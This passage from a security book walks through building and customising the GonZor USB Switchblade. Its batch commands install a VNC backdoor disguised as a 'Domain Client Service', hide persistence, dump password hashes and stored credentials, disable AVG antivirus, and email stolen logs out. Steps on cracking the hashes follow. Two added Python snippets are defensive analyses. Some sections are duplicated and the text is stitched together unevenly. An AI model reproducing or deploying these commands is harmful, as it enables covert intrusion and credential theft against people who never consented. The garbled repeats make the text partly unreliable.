Seven Deadliest USB Attacks, part 3
- 23 pages
- .pdf file
Inside the Switchblade 33
TightVNC
TightVNC is a remote-control software package that is provided free of charge (GNU
General Public License)A with full source-code availability. It provides a stable client or server remote utility, permitting graphical desktop representation of target UNIX and Windows platforms via the local network or Internet. This version of
VNC provides enhanced capabilities such as file transfers, mirrored drivers (effi-
cient screen updates), remote desktop scaling, and a new Tight encoding with JPEG
compression, which optimizes slow connections generating significantly less traf-
fic. Browser access is also included via an HTTP server and a Java viewer applet.
Two passwords are supported for read-only and full control access. TightVNC is
sustained by Constantin Kaplinsky with the assistance of multiple corporations who
participate in development and life-cycle support. Updated software can be found at
www.tightvnc.com/download.php.
Note
Note the display name and service description in the script below, chosen to deter an uninformed user from stopping the service.
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1
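As an added example that is not code from the book or the GonZor payload, the following Python parses the text that sc qc prints and flags the traits of the service the script above creates: an interactive, auto-start service whose binary sits in the root of %systemroot% under a display name that says nothing about the VNC server behind it. The sc qc sample is constructed to match that script; WINDIR and the remote-control name markers are assumptions.

```python
# Added example, not from the book or the GonZor payload. Parses `sc qc`
# output and flags the traits of the disguised WinVNC service that the
# script above creates. The sample output is constructed to match it.
import ntpath
import re
from typing import Dict, List

SERVICE_INTERACTIVE_PROCESS = 0x100   # bit in the hex TYPE value ("type= interact")
SERVICE_AUTO_START = 2                # START_TYPE value ("start= auto")

# Assumption: Windows directory of the host being checked. On a live system
# use os.environ["SystemRoot"] instead.
WINDIR = r"C:\WINDOWS"

# Substrings of a binary name that identify a remote-control tool; taken from
# the script above (winvnc.exe). Extend for your environment.
REMOTE_CONTROL_MARKERS = ("vnc",)

# Constructed sample in the layout `sc qc` prints: the service from the script
# above plus one benign service for contrast.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WinVNC
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\winvnc.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Domain Client Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: Dnscache
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\system32\svchost.exe -k NetworkService
        LOAD_ORDER_GROUP   : TDI
        TAG                : 0
        DISPLAY_NAME       : DNS Client
        DEPENDENCIES       : Tcpip
        SERVICE_START_NAME : NT AUTHORITY\NetworkService
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")
EXE_RE = re.compile(r'^"?(.+?\.exe)"?(?:\s|$)', re.IGNORECASE)


def parse_sc_qc(text: str) -> List[Dict[str, str]]:
    """Split sc qc output into one FIELD -> value dict per service."""
    services: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue  # "[SC] ..." banner and blank lines
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            current = {}
            services.append(current)
        if services:
            current[key] = value
    return services


def suspicious_traits(svc: Dict[str, str]) -> List[str]:
    """Reasons this service matches the disguised WinVNC pattern (empty if none)."""
    reasons: List[str] = []
    service_type = int(svc.get("TYPE", "0").split()[0], 16)
    start_type = int(svc.get("START_TYPE", "0").split()[0])
    binpath = svc.get("BINARY_PATH_NAME", "")
    display = svc.get("DISPLAY_NAME", "")
    m = EXE_RE.match(binpath)
    exe = m.group(1) if m else binpath
    basename = ntpath.basename(exe).lower()

    # "type= interact": rare for legitimate services, needed for a VNC
    # server to see the logged-on user's desktop.
    if service_type & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("interactive service")
    # The script XCOPYs winvnc.exe into the root of %systemroot%; real
    # service binaries live in system32 or a product directory.
    if ntpath.dirname(exe).lower() == WINDIR.lower():
        reasons.append("binary in the root of %systemroot%")
    # Display name that hides what the binary actually is.
    for marker in REMOTE_CONTROL_MARKERS:
        if marker in basename and marker not in display.lower():
            reasons.append(f"{basename} presented as {display!r}")
    # Only worth noting once something else fired: most services auto-start.
    if reasons and start_type == SERVICE_AUTO_START:
        reasons.append("auto start")
    return reasons


def scan(text: str) -> Dict[str, List[str]]:
    """Service name -> traits, for services that triggered at least one check."""
    hits: Dict[str, List[str]] = {}
    for svc in parse_sc_qc(text):
        traits = suspicious_traits(svc)
        if traits:
            hits[svc["SERVICE_NAME"]] = traits
    return hits


if __name__ == "__main__":
    for name, traits in scan(SAMPLE_SC_QC).items():
        print(f"{name}: {', '.join(traits)}")
```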
Hacksaw
This version of the USB Switchblade provides an option to install Hacksaw. It provides the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor tweaks. The original version of the USB Switchblade transferred the log files containing the output back to the writable portion of the USB flash drive. While this feature is still available, the addition of Hacksaw allows the logs to be sent to an e-mail address of the user's choosing. The sbs.exe will still run in the background and copy the contents of USB drives that are inserted into the installed system. The supported version of the Hacksaw program is included with the download package provided in the next section.
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1
A www.gnu.org/copyleft/gpl.html
34 CHAPTER 2 USB Switchblade
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
WirelessKeyView
WirelessKeyView is a utility from Nirsoft. It can recover all wireless network secu-
rity keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access
(WPA) that are contained in the Wireless Zero Configuration (XP) and WLAN
AutoConfig (Vista) services on a system. This tool’s command options give you the
ability to sort or export to various formats. The following Web site can be checked if
updated versions are required: www.nirsoft.net/utils/wireless_key.html.
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Password Dump
PwDump is a name given to several types of programs with multiple developers
that are able to provide an output of the NT LAN Manager (Windows NTLM) and
LAN Manager (LM) password hashes for user accounts contained in the local security accounts manager (SAM). This tool is used to extract the raw password hashes from a Windows SAM file. Once you have extracted the hashes from the Windows SAM file, an alternate program can be used to find the exact text passwords used on the
system. The next section will describe the additional tools required to interpret the
hashes derived from this program. The most recent version of the software can be
found at www.tarasco.org/security/pwdump_7/index.html.
.\pwdump 127.0.0.1 >> %log% 2>&1
Fizzgig Dump
Fgdump was developed for use in environments with AV and other detection software enabled. It wraps the PwDump and CacheDump utilities in order to reduce the problems increasingly encountered when running these tools individually. The development of this tool appears to be in full swing, with extensive auditing targeted for Windows domains and their respective trust relationships (additional tools are required for this). This tool is being provided in addition to the individual PwDump and CacheDump utilities in case problems are encountered running them natively. The updated release of this software can be found at http://swamp.foofus.net/fizzgig/fgdump/downloads.htm.
%U3%\fgdump.exe" -c >> %log% 2>&1
Network Password Recovery
Network Password Recovery allows an administrator to recover all passwords (includ-
ing domain) of the current logged-on user used for establishing connections to network
shares. It can also retrieve .NET Passport passwords for sites if they were saved in this
manner. External credentials files can also be parsed so long as the last logged-on
account password is known. This is another utility written by Nirsoft, and current ver-
sions can be found at www.nirsoft.net/utils/network_password_recovery.html.
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Mail Password Viewer
Mail PassView is a tool that can reveal the password and account details for numer-
ous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook
2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora,
Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (with-
out master password encryption), Group Mail Free, Yahoo! Mail (if stored in Yahoo!
Messenger application), Hotmail/MSN mail (if stored in MSN/Windows/Live
Messenger application), and Gmail (if stored in Gmail Notifier application, Google
Desktop, or by Google Talk). Once again, this is another Nirsoft tool and updates can
be found at www.nirsoft.net/utils/mailpv.html.
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
Firefox Password Recovery
FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox
database. Firefox records username and password details for every Web site the user authorizes and stores them in an encrypted database. If a master password is set, it will be needed; otherwise the tool will not be able to display these credentials. Some sites also
prevent the saving of passwords in a browser, which is another limitation that should
be considered. Check the following site for the most recent updates to this tool: www.
securityxploded.com/download/FirePassword_bin.zip.
.\FirePassword.exe >> %log% 2>&1
Internet Explorer Password Viewer
Internet Explorer PassView is another tool from Nirsoft designed to provide pass-
word management, which can reveal passwords that have been stored in the browser.
This utility can recover three different types of passwords: AutoComplete, HTTP
authentication passwords, and FTP. It gathers these by parsing Windows protected
storage, the registry, and a credential file. Known issues exist starting with Internet
Explorer 7.0 because Microsoft is changing the way in which some passwords are
stored, so limitations may be encountered. The most recent versions of this software
include the ability to read offline or external sources if you know the password of the
last logged-on user for this profile. Check this site if updated versions are required:
www.nirsoft.net/utils/internet_explorer_password.html.
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Messenger Password Recovery
MessenPass is another password recovery tool that reveals the passwords of com-
mon instant-messenger applications. It can be used only to recover the passwords
for the current logged-on user on the local computer, and it only works if you chose
the “remember your password” option in the programs. This tool cannot be used for
grabbing the passwords from other user profiles. When running MessenPass, it auto-
matically detects the instant-messenger applications installed on the target system,
decrypts the passwords, and displays all user credentials found. This Nirsoft tool can
be found at www.nirsoft.net/utils/mspass.html.
.\mspass.exe /stext %tmplog% >> %log% 2>&1
CacheDump
CacheDump was designed to capture the credentials of a domain user who is cur-
rently logged on to a system. It targets Windows’ inherent offline caching techniques
performed by the Local Security Authority (LSA) system service. This service uses
a cached version of the password to allow users to log on when a domain controller
is unavailable to authenticate them. This tool creates a temporary service, allowing it
to grab hash values of passwords, which can be taken offline for later cracking. The
most current release of this program can be found at www.hacktoolrepository.com/
category/9/Passwords.
.\cachedump.exe >> %log% 2>&1
Protected Storage Password Viewer
Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords
housed on a system stored by Internet Explorer, Outlook Express, and MSN Explorer.
This tool also has the capability to reveal information stored in the AutoComplete
strings of Internet Explorer. If an update for this tool is required, check the following
location: www.nirsoft.net/utils/pspv.html.
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Product Key Recovery
ProduKey, a tool from Nirsoft, presents the product identifier and the associated
keys for Microsoft products installed on the system. Microsoft Office 2003/2007,
Exchange, SQL, and even operating system (including Windows 7) keys can
be extracted using this. It is also capable of gathering keys from remote systems
if permissible and includes additional customizable command options for your
convenience. The following location contains additional information regarding this
tool: www.nirsoft.net/utils/product_cd_key_viewer.html.
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1
History Scraper
A preconfigured VB script has been included in the Switchblade download package
to provide a summary of the most recently viewed Web sites on the target machine.
No additional files or updates are required in order for this to complete.
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
Windows Updates Lister
WinUpdatesList will display all of the Windows updates, including hotfixes, that
are installed in a local or remote system. Hotfix information includes the associated
files, and the user interface will even provide a link to the Microsoft site, which
includes detailed information related to the specific update. This tool applies to
Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The fol-
lowing Web site contains additional information regarding this tool: www.nirsoft.
net/utils/wul.html.
.\wul.exe /stext %tmplog% >> %log% 2>&1
Network Statistics
The network statistics command displays active network connections, listening ports,
associated processes, and a variety of other network statistics. This tool is already
included on all relevant Windows systems.
netstat.exe -abn >> %log% 2>&1
Port Query
Portqry.exe is a command-line utility that is often used to troubleshoot network con-
nectivity issues. Portqry.exe is included on systems based on Windows 2000, XP,
and 2003 and can be downloaded for use on others. The utility reports the status
of Transmission Control Protocol and User Datagram Protocol ports on a desired
machine. It is able to report listening, nonlistening, and filtered ports individually by
listing or in a sequential range. The most updated version of this tool can be found at
www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5-
ac828bdc6983&displaylang=en.
.\portqry -local -l %tmplog% >> %log% 2>&1
The tools described above are already contained in the USB Switchblade pack-
age download provided in the next section. If you intend to use the tools included
in Switchblade, it would be in your best interest to familiarize yourself with each
independently. Each of these tools provides additional parameters and customization
options depending on your needs. The attack recreation included below will provide
you with a basic understanding of how these are commonly deployed.
Switchblade Assembly
As previously stated, the ultimate goal of USB Switchblade is to simplify the recov-
ery of critical information from computers running Windows 2000 or later. With
administrator access, it is able to retrieve password hashes, LSA secrets, IP informa-
tion, and much more. This section will demonstrate how to build and deploy a U3
flash drive with the -=GonZor=- SwitchBlade technique.
Note
If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted
to allow the execution of the tools within the Switchblade. A dialogue box stating
“Windows need your permission to continue” will be displayed. UAC must be disabled on these systems both when building the Switchblade and to allow automated retrieval on target systems.
This first set of directions included will build a default version of Switchblade.
These are provided for quick reference should you encounter an updated release
of the Switchblade software, which may better suit your needs. Customization
instructions will follow these procedures to allow you to update or add to existing
distributions.
1. The Switchblade v2.0 payload needs to be downloaded. This package can be found
at http://rapidshare.com/files/113283682/GonZors_SwitchBlade-V2.0.zip.
2. If you are using an XP system, the Universal Customizer software previously
downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process.
If you have Vista or 7 systems, download the compatible Universal Customizer at
http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html.
Warning
If any AV applications are running on the machine you are using to download or create the
U3 Switchblade, problems will be encountered. Most antivirus software will recognize the
tools contained in Switchblade as malicious and will attempt to remove them. To head off
any problems, disable antivirus on the system you are using to build Switchblade.
3. Create a separate directory for each program you just downloaded and unzip the files into their respective folders.
4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the
Universal Customizer directory.
5. Insert your U3 USB drive.
6. Launch the Universal Customizer by executing Universal_Customizer.exe.
7. Follow the on-screen instructions and prompts until complete, accepting the
default selections where applicable. Steps 9–13 in the “How to Recreate the
Attack” section of Chapter 1, “USB Hacksaw,” provides detailed directions and
screenshot illustrations for these steps.
8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If
failures persist, download and install the latest version of the LaunchPad installer
(lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe.
Sporadic results can be encountered with this program as well, so let your tena-
cious side shine through.
9. Once you have successfully applied the Switchblade ISO using the Universal
Customizer process, place the SBConfig.exe and ip.shtml from the Switchblade
directory onto the removable disk partition and run SBConfig.exe.
10. Enable the desired tools by checking the appropriate boxes and entering all
other required information. After making your changes, select Update Config.
The next section will describe these and other steps in more detail and pro-
vide caveats for deployments on related systems. This completes a basic USB
Switchblade installation for the GonZor package.
Customizing the Original Payload
The steps below will walk you through updating an existing tool within a payload.
Testing of the package previously prescribed produced some errors when trying to
parse the updated target applications. Changes were made to the wget command
to properly output an external IP address in the log file. Additional procedures are
provided to disable AVG antivirus to smooth the automated initialization of the
Switchblade script. In order to modify the original payload, you will need to extract
the files from the GonZor ISO. This process can be used to update any of the tools
used in the payload. The following will be needed to complete this customization.
• Any U3 drive
• A working version of the GonZor USB Switchblade
• The current version of PsTools or the PsKill utility specifically. The download
location for this was provided in Chapter 1, “USB Hacksaw.”
• Download and install the current version of MagicISO. This tool can be down-
loaded from www.magiciso.com/.
Note
At the time of this writing, the most recent version of the Switchblade payload was v2.0.
1. Create a separate folder for each program you just downloaded and unzip the files
into their respective folders.
2. Create a new directory to extract the original GonZor ISO. We will refer to this
directory as %GONZOR_ISO%\ in the following steps.
3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into
%GONZOR_ISO%\.
4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM.
iso file and extract to %GONZOR_ISO%\.
5. Copy pskill.exe to %GONZOR_ISO%\SYSTEM\SRC.
Note
The AVG 9.0 service name has changed in the registry. For this reason, there are two driver
entries specified in the file for both AVG 8.5 and AVG 9.0 in the next step. If you encounter
a newer release of AVG, this registry file may need to be adjusted to work in an updated
environment.
6. Next, create a .reg file to disable the AVG antivirus services and set them to take
no action in the event of a service failure. Copy and paste the text given below
into a Notepad file and save it as AVKill.reg. Any other services of concern can
be added to this file for disablement. The Start and FailureAction values included
here can be duplicated for the additional services.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
  00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
  00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00
7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM\SRC\.
8. Locate the go.bat file in %GONZOR_ISO%\SYSTEM\SRC. Right-click and
select Edit, and then find the 0.dat line in this file.
9. In the go.bat, enter the following text. Killing of other processes is included as a
fail-safe due to inconsistencies found between the various versions of Windows
operating systems. If you added other services to the registry file in step 6, their
associated processes must be included here.
ECHO --------------------------------------------------------------------------->> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [AVGKill] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO AVG services have been disabled >> %log% 2>&1
REGEDIT /s .\avkill.reg >> %log% 2>&1
.\pskill -t avgam.exe >> %log% 2>&1
.\pskill -t avgrsx.exe >> %log% 2>&1
.\pskill -t avgwdsvc >> %log% 2>&1
.\pskill -t avgnsx.exe >> %log% 2>&1
.\pskill -t avgcsrvx.exe >> %log% 2>&1
.\pskill -t avgtray.exe >> %log% 2>&1
.\pskill -t agrsmsvc.exe >> %log% 2>&1
.\pskill -t avgwdsvc.exe >> %log% 2>&1
)
IF EXIST %include%\19.dat" (
ECHO -------------------------------------------------------------
10. Search and find the 1.dat line in the same file. Place a “;” at the start of these
commands used for the wget. The wget commands should now appear like the
below statements.
;.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
;ECHO. >> %tmplog% 2>&1
;COPY %log%+%tmplog%* %log% >> NUL
;DEL /f /q %tmplog% >NUL
11. Insert the following wget command line just above the old wget command.
.\wget -q -O - http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1
12. Save and close the file.
13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the
U3CUSTOM.iso) into the U3Custom folder of the Universal Customizer.
Tip
Ensure that the Universal Customizer\U3Custom directory is empty before you copy the
updated files into it. Only files that you want included in the final ISO should be contained
in this folder.
14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create
the updated ISO. The output provided should appear similar to Figure 2.1.
15. Press any key when prompted to complete the build.
16. The updated ISO will be placed into the bin directory automatically.
17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated
ISO.
18. Follow the prompts until complete, accepting the default selections, and provide a
password when required. Steps 9–13 in the “How to Recreate the Attack” section
of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process.
19. Insert the U3 drive and place the SBConfig.exe (this file is located in the
unpacked Switchblade payload) onto the removable disk partition and run it.
20. Select the tools from the payload that you want to run by checking the boxes,
as shown in Figure 2.2. The output of this script will be sent to a log file on
the removable disk partition of the U3 drive (System/Logs/%computername%/*.
log) after it is run.
Figure 2.1: Universal Customizer ISOCreate Command Window
Figure 2.2: GonZor Payload Configuration Options Dialogue
21. Optionally, you can enter a valid mail account, password, and connection infor-
mation if you want the Switchblade logs and Hacksaw payloads to be sent to an
external source, as shown in Figure 2.2.
22. The payload will be disabled by default. When you are finished editing, click
Update Config and then Quit. Save the configuration when prompted.
23. You have now established a customized version of the -=GonZor=- Payload
v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies
once it is plugged into a computer with administrative privileges.
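As an added example that is not part of the book or the GonZor payload, the following Python decodes the AVKill.reg file from step 6 the way an analyst would check an unknown .reg file before it reaches a host: it reads each service's Start value and unpacks the FailureActions blob as the SERVICE_FAILURE_ACTIONS structure it encodes. The .reg text is the one given in step 6; nothing else is assumed.

```python
# Added example, not from the book or the GonZor payload. Decodes the
# AVKill.reg text from step 6: Start (4 = DISABLED) and the FailureActions
# binary value, which stores a SERVICE_FAILURE_ACTIONS structure.
import struct
from typing import Dict, List, Tuple, Union

# The .reg text exactly as given in step 6.
AVKILL_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
  00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,53,00,65,\
  00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00
"""

START_TYPES = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START",
               3: "DEMAND_START", 4: "DISABLED"}
SC_ACTION_TYPES = {0: "SC_ACTION_NONE", 1: "SC_ACTION_RESTART",
                   2: "SC_ACTION_REBOOT", 3: "SC_ACTION_RUN_COMMAND"}

RegValue = Union[int, bytes, str]


def parse_reg(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Minimal .reg (version 5.00) reader: key path -> {value name -> data}.
    Handles dword:, hex: (with backslash line continuation) and "string"."""
    keys: Dict[str, Dict[str, RegValue]] = {}
    section = ""
    pending = ""  # partial hex value waiting for its continuation line
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            keys.setdefault(section, {})
            continue
        name, _, value = line.partition("=")
        name = name.strip().strip('"')
        if value.startswith("dword:"):
            keys[section][name] = int(value[len("dword:"):], 16)
        elif value.startswith("hex:"):
            keys[section][name] = bytes.fromhex(value[len("hex:"):].replace(",", ""))
        else:
            keys[section][name] = value.strip('"')
    return keys


def decode_failure_actions(data: bytes) -> Tuple[int, List[Tuple[str, int]]]:
    """Unpack SERVICE_FAILURE_ACTIONS: a 20-byte header (reset period, two
    string pointers, action count, actions pointer) followed by cActions
    pairs of (SC_ACTION_TYPE, delay in milliseconds)."""
    reset_period, _reboot_msg, _command, count, _actions_ptr = \
        struct.unpack_from("<5I", data, 0)
    actions: List[Tuple[str, int]] = []
    for i in range(count):
        action_type, delay_ms = struct.unpack_from("<2I", data, 20 + 8 * i)
        actions.append((SC_ACTION_TYPES.get(action_type, f"UNKNOWN({action_type})"), delay_ms))
    return reset_period, actions


def summarize(reg_text: str) -> Dict[str, dict]:
    """Service name -> {"start", "reset_period", "actions"} for each
    Services\\<name> key the .reg file touches."""
    report: Dict[str, dict] = {}
    for key, values in parse_reg(reg_text).items():
        service = key.rsplit("\\", 1)[-1]
        entry: dict = {"start": None, "reset_period": None, "actions": []}
        if isinstance(values.get("Start"), int):
            entry["start"] = START_TYPES.get(values["Start"], values["Start"])
        if isinstance(values.get("FailureActions"), bytes):
            entry["reset_period"], entry["actions"] = decode_failure_actions(values["FailureActions"])
        report[service] = entry
    return report


if __name__ == "__main__":
    for service, info in summarize(AVKILL_REG).items():
        print(service, info)
```

The decoded result shows both AVG services set to DISABLED with three SC_ACTION_NONE entries (60000 ms delay each), which is what "take no action in the event of a service failure" means in registry terms.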
As you can see, it wasn’t very difficult to customize a smart U3 USB. Use
extreme caution when anyone requests to insert his or her USB flash drive into
your system. The person could easily disguise a legitimate payload as a misdirec-
tion tactic while his or her Switchblade silently performs its magic. Unattended
XP, 2003, Vista, and 7 systems with password-protected screen savers engaged
will not allow autorun to initiate, thus preventing the automated process
without authentication. If the screen saver is not protected by a password, auto-
run can be engaged once the desktop becomes active. Windows 95, 98, and ME
screen savers can be circumvented, but these systems are scarcely seen in this
day and age.
Most of the tools worked correctly for Vista, with some success attained
on 7 systems. User interaction was required on both to initiate the script after
Switchblade insertion. To achieve better results on these systems, you will need
to find updated releases of each tool for the respective target operating system or
application.
Windows Password Hashes
Once you have successfully deployed the Switchblade on a target system,
retrieving the passwords from the hashes provided might be required. You will
need the Switchblade log file located on the removable disk partition of the
U3 flash drive (system/logs/%computername%/*.log). The Windows passwords
are stored as LM and NTLM hashes in c:\windows\system32\config\SAM. To get the passwords, you need a Windows password cracker that recovers the plaintext from the LM hashes. The following steps will walk you through the installation, configuration, and retrieval of a password using ophcrack.
1. Download ophcrack from http://ophcrack.sourceforge.net/.
2. Double-click the installation executable and click Next, as seen in Figure 2.3.
3. Select all components, as shown in Figure 2.4, and click Next.
4. Install in the default directory, as indicated in Figure 2.5, and click Next.
5. Install the tables in the default directory, as depicted in Figure 2.6, and click
Install.
Figure 2.3: ophcrack Installation Dialogue
Figure 2.4: ophcrack Installation Dialogue
Figure 2.5: ophcrack Installation Dialogue
Figure 2.6: ophcrack Installation Dialogue
6. The tool will now be installed and the rainbow tables will be downloaded. A prog-
ress bar should reflect the remaining installation, as seen in Figure 2.7.
7. Click Next when prompted, as portrayed in Figure 2.8.
8. Click Finish to complete the install when prompted, as depicted in Figure 2.9.
9. If errors are encountered during the load or you just need additional tables, these
can be downloaded from the following locations.
• Download the XP Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/XP%20free/tables_xp_free_small.zip/download and
http://sourceforge.net/projects/ophcrack/files/tables/XP%20free/tables_xp_
free_fast.zip/download.
• Download the Vista Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/Vista%20free/tables_vista_free.zip/download.
10. Unzip the files once they are downloaded.
11. Launch ophcrack and click Tables, as shown in Figure 2.10.
12. You should now have a pane displaying the expected tables, as shown in Figure 2.11.
Select the required table and click Install. XP free fast was used in this example.
13. Navigate to the location where you saved the table, as seen in Figure 2.12, and
click Install. Keep in mind that storing the rainbow tables on a fast medium like
a hard disk or flash drive will significantly speed up the cracking process. Avoid
using tables from CD-ROMs or DVDs.
Figure 2.7: ophcrack Installation Dialogue
Figure 2.8: ophcrack Installation Dialogue
Figure 2.9: ophcrack Installation Dialogue
Figure 2.10: ophcrack Application
Figure 2.11: ophcrack Program Table Selection
Figure 2.12: ophcrack Program Table Selection
14. Next, copy and paste the results from the [Dump SAM PWDUMP] section of
the Switchblade log file on the U3 USB drive into a separate Notepad file.
15. Save the file in a known location.
16. In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2.13.
17. Navigate to where you saved the Notepad file (step 15) and select it.
18. The LM hash from the file will be displayed in ophcrack, as shown in Figure 2.14.
19. Select Crack and wait for the results. The status will be displayed as shown in
Figure 2.15.
Given the number of possible password permutations, some results may take
longer than others. A 15-character password with good complexity could be very
difficult to crack, if even possible. Additional rainbow tables can be downloaded and
applied for more thorough analysis of a given hash.
Figure 2.13: ophcrack Program Load Options
Figure 2.14: ophcrack Program LM Hash Display
TightVNC
TightVNC is a remote-control software package that is provided free of charge (GNU
General Public License)A with full source-code availability. It provides a stable cli-
ent or server remote utility, permitting graphical desktop representations of a target
UNIX and Windows platforms via the local network or Internet. This version of
VNC provides enhanced capabilities such as file transfers, mirrored drivers (effi-
cient screen updates), remote desktop scaling, and a new Tight encoding with JPEG
compression, which optimizes slow connections generating significantly less traf-
fic. Browser access is also included via an HTTP server and a Java viewer applet.
Two passwords are supported for read-only and full control access. TightVNC is
sustained by Constantin Kaplinsky with the assistance of multiple corporations who
participate in development and life-cycle support. Updated software can be found at
www.tightvnc.com/download.php.
Note
Look at the clever display name and service description inserted in the script below put in
place to deter an uninformed user from stopping it.
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type=
interact type= own start= auto
displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows
Server Domain Controller and a connected Domain Client. If this
service is not started or disabled, domain functions will be
inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1 The network statistics command
Hacksaw
This version of the USB Switchblade provides an option to install Hacksaw. It provides
the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor
tweaks. This original version of the USB Switchblade transferred the log files contain-
ing the output back to the writable portion of the USB flash drive. While this feature is
still available, the addition of Hacksaw allows the logs to be sent via e-mail of the users
choosing. The sbs.exe will still run in the background and transfer the data of USB
